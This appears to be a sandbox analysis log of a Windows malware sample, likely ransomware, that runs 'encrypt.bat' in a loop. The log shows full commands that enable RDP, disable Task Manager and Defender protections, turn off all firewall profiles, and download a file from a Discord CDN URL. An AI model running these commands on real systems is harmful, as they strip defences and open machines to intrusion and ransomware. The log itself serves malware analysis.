C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f60⤵PID:328
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"60⤵PID:4532
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f60⤵PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:1108
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable60⤵PID:3436
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE60⤵PID:4696
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off60⤵PID:2180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off60⤵PID:4292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off60⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off60⤵PID:3856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off60⤵PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"60⤵PID:4132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"60⤵PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"60⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"61⤵PID:3420
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"62⤵PID:1456
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f62⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"62⤵PID:444
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f62⤵PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵PID:3244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:4968
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable62⤵PID:1356
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE62⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off62⤵PID:4820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off62⤵PID:428
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off62⤵PID:2252
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off62⤵PID:3064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off62⤵PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"62⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵PID:4492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:1580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"62⤵
- Blocklisted process makes network request
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"62⤵
- Command and Scripting Interpreter: PowerShell
PID:4128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"63⤵PID:3900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV164⤵PID:4928
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"64⤵PID:392
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f64⤵PID:3096
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"64⤵PID:1108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f64⤵PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵PID:4860
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable64⤵
- Modifies Windows Firewall
PID:1076
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE64⤵
- Modifies Windows Firewall
PID:3036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off64⤵PID:2944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off64⤵PID:2776
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off64⤵
- Modifies Windows Firewall
PID:2984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off64⤵PID:968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off64⤵
- Modifies Windows Firewall
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"64⤵PID:424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:3144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵PID:4300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"64⤵
- Blocklisted process makes network request
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"64⤵
- Command and Scripting Interpreter: PowerShell
PID:2928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"65⤵PID:2904
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"66⤵PID:2004
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f66⤵PID:1868
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"66⤵PID:932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f66⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:4144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:4236
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable66⤵PID:4796
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE66⤵PID:4508
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off66⤵PID:1384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off66⤵PID:4016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off66⤵PID:992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off66⤵PID:3900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off66⤵PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"66⤵PID:932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"66⤵
- Blocklisted process makes network request
PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"66⤵
- Command and Scripting Interpreter: PowerShell
PID:4432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"67⤵PID:444
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"68⤵PID:4304
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f68⤵PID:4880
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"68⤵PID:4616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f68⤵PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵PID:1920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:3420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:2004
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable68⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE68⤵PID:2684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off68⤵PID:4836
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off68⤵
- Modifies Windows Firewall
PID:880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off68⤵
- Modifies Windows Firewall
PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off68⤵PID:1912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off68⤵PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"68⤵PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵
- Command and Scripting Interpreter: PowerShell
PID:3236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:1196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"68⤵
- Blocklisted process makes network request
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"68⤵
- Command and Scripting Interpreter: PowerShell
PID:4936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"69⤵PID:4524
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"70⤵PID:1000
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f70⤵PID:4700
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"70⤵PID:1792
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f70⤵PID:4172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:4616
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable70⤵
- Modifies Windows Firewall
PID:4956
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE70⤵
- Modifies Windows Firewall
PID:3596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off70⤵PID:1708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off70⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off70⤵PID:4360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off70⤵PID:4924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off70⤵PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"70⤵PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"70⤵
- Blocklisted process makes network request
PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"70⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:2996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"71⤵PID:3244
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"72⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f72⤵PID:3060
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"72⤵PID:712
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f72⤵PID:4612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:4040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:1000
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable72⤵PID:2212
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE72⤵
- Modifies Windows Firewall
PID:4984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off72⤵
- Modifies Windows Firewall
PID:1872
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off72⤵PID:2412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off72⤵PID:4236
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off72⤵PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off72⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"72⤵PID:712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"72⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"72⤵
- Command and Scripting Interpreter: PowerShell
PID:244 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"73⤵PID:4384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV174⤵PID:4432
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"74⤵PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f74⤵PID:2100
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"74⤵PID:3380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f74⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:2996
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable74⤵PID:1632
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE74⤵PID:3416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off74⤵
- Modifies Windows Firewall
PID:2384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off74⤵PID:4376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off74⤵PID:3552
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off74⤵
- Modifies Windows Firewall
PID:2800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off74⤵PID:264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"74⤵PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:2752
-
-
